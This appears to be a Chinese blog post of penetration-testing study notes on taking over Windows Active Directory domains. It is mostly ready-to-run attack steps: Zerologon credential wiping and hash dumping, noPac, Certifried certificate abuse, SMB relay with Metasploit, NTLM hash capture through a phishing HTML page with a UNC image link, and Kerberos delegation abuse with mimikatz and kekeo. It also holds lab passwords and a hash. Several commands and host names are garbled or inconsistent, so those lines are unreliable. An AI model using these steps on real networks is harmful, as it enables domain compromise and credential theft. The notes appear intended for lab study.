day133
CVE-2014-6324
见 PTT 横向移动
CVE-2020-1472
谨慎使用,域凭证长期置为空可能会出问题
0、获取计算机名:
nbtscan -v -h 192.168.3.21
1、连接DC清空凭证:
proxychains python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
2、获取域内HASH:
proxychains python secretsdump.py OWA2010CN-G0D$@192.168.3.21 -just-dc -no-pass
3、连接域控PTH:
python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21
4、后续恢复密码
重置密码:
https://github.com/dirkianm/CVE-2020-1472
恢复密码:
https://github.com/risksense/zerologon
CVE-2021-42287
前提条件:一个域内普通账号
影响版本:windows基本全系列
https://github.com/cube0x0/noPac
https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools
前置:
1、代理后:
修改nost绑定域名和IP
2、扫描探针:
noPac scan -domain god.org -user webadmin -pass admin!@#45
3、利用连接:
noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec owa2010cn-god.god.org cmd
CVE-2022-26923
当windows系统的Active Directory证书服务(cs)在域上运行时,由于机器账号中的**dNSHostName属性不具有唯一性**,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。
简单来说就是创造一个机器账号,伪装成域控
导向:win8.1、win10、win11、Winserver2012R2、Winserver2016、Winserver2019、Winserver2022等版本
前提条件:
1、一个域内普通账生
2、域内存在证书服务器
kali添加访问域内信息 /etc/hosts
192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7S8328Q6R-CA
192.168.1.15 WIN-3C75532806R.xiaodi.local
获取CA结构名和计算机名
certutil -config - -ping
域内信息
192.168 1.15
test pass123
xiaodi-WIN-3C7SS323Q6R-CA
WIN-3C75532506R.xiaodi.local(域控)
1、申请低权限用户证书:
certipy req ‘xiaodi.local/test:Pass123@WIN-3C75832806R.xiaodi.local’ -ca xiaodi-WIN-3C78832806R-CA -template User -debug
2、检测证书
certipy auth -pfx test.pfx
3、创建一个机器账户:
python3 bloodyAD.py -d xiaodi local -u test -p ‘a33123’ --host 192.168.1.15 addComputer pwnmachine ‘CVEPassword1234*’
4、设置机器账户属性(dNSHostName和DC一致):
python3 bloodyAD.py -d xiaodi.local -u test -p ‘Pass123’ --host 192.168.1.15 setAttribute ‘CN=pwnmachine,cN=Computer3,DC=xiaodi,DC=local’ dNSHostName ‘[“WIN-3C78532506R.xiaodi.local”]’
5、再次申请证书:
certipy red
‘xiaodi.local/pwnmachine$:CVEPassword1234*@192 168.1.15’ -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C755325Q6R-CA
6、检测证书:
certipy auth pfx ./win-3c733323q6r.pfx -dc-ip 192.168.1.15
7、导出域控主机中所有hash:(impacket套件)
python3 secretsdump.py ‘xiaodi.local/win-3078832806r5WIN-3C758328068.xiaodi.local’ -hashs :10e026ef2258ad96239e2281a01827a4
8、利用HASH:
pth
10.SMB重放
dir \192.168.x.x/c$
原理:使用smb通讯时,默认使用**当前**的账号密码连接
域用户mary jack,本地用户administrator等
一般重放本地system用户或administrator用户来进行横向移动
条件:通讯双方当前用户密码一致
MSF:
后门上线
添加路由:
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
backgroup //返回
重发模块:
use exploit/windows/smb/smb_relay
set smbhost 192.168.46.135 //转发攻击目标
set lhost 192.168.46.166 //设置本地 IP
set autorunscript post/windows/manage/migrate
主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.X //设置连接目标
run
11.Inveigh 嗅探-Hash 破解
条件:一台域主机的管理员权限
Responder 中继攻击-NTLM Hash 破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh
1、监听拦截
Inveigh.exe
获取到的是 NET NTLM HASH V1 或 V2
2、触发拦截
dir \192.168.3.x\c$
2.1、配合钓鱼,内网主机开启建议http服务
触发http://192.168.3.31/1.html
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<img src="https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=file%3A%2F%2F%2F%5C%5C192.168.3.32%5C2&pos_id=img-KywbanaV-1712398492259)">
</body>
</html>
3.hashcat破解监听到的hash
12.非约束委派&约束委派&资源约束委派
委派攻击总结:
约束委派:首先判断委派的第二个设置,然后看针对用户,后续钓鱼配合
非约束委派:首先判断委派的第三个设置,然后看针对用户,主动攻击
资源约束委派:只看 DC 是不是 2012 及以上帮版本,然后看针对用户,主动攻击
参考:https://xz.aliyun.com/t/11555
非约束委派
原理:
机器 A(域控)访问具有非约束委派权限的机器 B 的服务,会把当前认证用户(域管用
户)的的 TGT 放在 ST 票据中,一起发送给机器 B,机器 B 会把 TGT 存储在 lsass 进程
中以备下次重用。从而机器 B 就能使用这个 TGT 模拟认证用户(域管用户)访问服务。
利用场景
攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管
理员的 TGT,从而模拟域管用户。
复现配置:
1、信任此计算机来委派任何服务
2、setspn -U -A priv/test webadmin
判断查询:
查询域内设置了非约束委派的服务账户:
AdFind -b “DC=god,DC=org” -f “(&(samAccountType=805306368 (userAccountControl:1.2.840.113556.1.4.803:=524288))” dn
查询域内设置了非约束委派的机器账户:
AdFind -b “DC=god,DC=org” -f “(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))” dn
利用步骤:
1、域控与委派机器通讯
主动:
net use \webserver
钓鱼:
http://192.168.3.31/31.html
2、导出票据到本地
mimikatz sekurlsa::tickets /export
3、导入票据到内存
mimikatz kerberos::ptt [0;fece8]-2-0-60a00000-Administrator@krbtgt-GOD.0RG.kirbi
4、连接通讯域控
dir \owa2010cn-god\c$
约束委派
原理:
由于非约束委派的不安全性,微软在windowsservex2003中引入了约束委派,对Kerberos协议进行了拓展,引入了Service for User to Self(S4U2self)和Service for User to Proxy(S4U2proxy)。
利用场景:
如果攻击者控制了服务A的账号,并且服务A配置了到域控的CIFS服务的约束性委派。则攻击者可以先使用S4U2self申请域管用户(administrator)访问A服务的ST1,然后使用S4U2proxy 以administrator身份访问域控的CIFS服务,即相当于控制了域控。
复现配置:
1、主机设置仅信任此计算机指定服务-cifs
2、用户设置仅信任此计算机指定服务-cifs
1、判断查询
查询机器用户(主机)配置约束委派
AdFind -b “DC=god,DC=org” -f “((samAccountType=805306369)(msds-allowedtodelegateto=*))” msds-allowedtodelegateto
查询服务账户(主机)配置约束委派
AdFind -b “DC=god,DC=org” -f “((samAccountType=805306368)(msds-allowedtodelegateto=*))” msds-allowedtodelegateto
2、利用用户票据获取域控票据
kekeo “tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
/user:Administrator@god.org /service:cifs/owa2010cn-god” “exit”
kekeo “tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org” “exit”
3、导入票据到内存
mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org@GOD.ORG.kirbi
4、连接通讯域控
shell dir \owa2010cn-god.god.org\c$
资源约束委派
基于资源的约束委派(RBCD)是在windows server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。
-》计算机加入域时,加入域的域用户被控后也将导致使用当前域用户加入的计算机受控。
条件:
1、域控windows2012及以上
2、多台主机由一个域用户加入域
获取受害目标:看有哪些主机是由一个域用户加入域的,是否有相同sid值
AdFind.exe -h 192.168.3.33 -b “DC=xiaodi,DC=local” -f “objectClass=computer” ms-DS-CreatorSID
S-1-5-21-1695257952-3088263962-2055235443-1104
判断受害用户是谁:
sid2user.exe \192.168.3.33 5 21 1695257952 3088263962 2055235443 1104
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
